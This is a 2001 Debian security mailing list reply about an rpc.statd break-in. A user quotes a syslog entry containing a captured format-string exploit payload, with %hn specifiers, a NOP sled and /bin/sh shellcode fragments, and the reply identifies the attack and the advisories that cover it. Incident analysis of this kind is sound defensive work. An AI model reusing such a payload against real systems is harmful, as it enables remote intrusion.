Re: none

To: Russell Speed <rfspeed@attcanada.ca>
Cc: debian-security@lists.debian.org
Subject: Re: none
From: Momchil Velikov <velco@fadata.bg>
Date: 15 Sep 2001 20:29:18 +0300
Message-id: <[🔎] 87itekfjm9.fsf@fadata.bg>
In-reply-to: Russell Speed's message of "15 Sep 2001 12:51:26 -0400"
References: <[🔎] 1000572686.1207.29.camel@rover>

>>>>> "Russell" == Russell Speed <rfspeed@attcanada.ca> writes:

Russell> I am curious if the following is an example of a buffer overflow.  I

Yes. I have the same in my log.
See http://www.debian.org/security/2000/20000719a
and http://www.cert.org/advisories/CA-2000-17.html

Russell> noticed this in my syslog - and the following day had someone logged in
Russell> from an IP I'm not aware of.

Russell> I changed the passwords - and added an entry to the input chain to block
Russell> the IP, but am wondering what other things I should do? 

Russell> Should I remove /bin/sh for something less obvious as a general
Russell> protection from buffer overflows?

That would render unusable lots of shell scripts staring with #!/bin/sh.  

Russell> As you can see it's a lot of binary and then near the end is "/bin/sh".

Russell> Sep  9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for
Russell> ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Russell> Sep  9 21:27:43 gw
Russell> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^A
Russell> Í\200è\177ÿÿÿ

I'd like someone more knowledgable to comment on this if possible.
This log is somewhat different compared to one published by CERT,
where you can see a pretty backdoor installed in inetd.conf. In fact
after checking my system (not very thoroughly, just quick look on
setuids, passwd, shadow, inetd.conf, etc. looking for hidden
derectories (e.g. find / -name ".. *") I was unable to find any
intrusion and was thinking that the attempt wasn't successful, before
I got this mail.

Regards,
-velco

Reply to:

Follow-Ups:
- Re: none
  - From: Michael Wood <mwood@its.uct.ac.za>

References:
- [no subject]
  - From: Russell Speed <rfspeed@attcanada.ca>

Prev by Date: Re: your mail
Next by Date: rpc.statd exploit (was Re: none)
Previous by thread: Re: your mail
Next by thread: Re: none
Index(es):
- Date
- Thread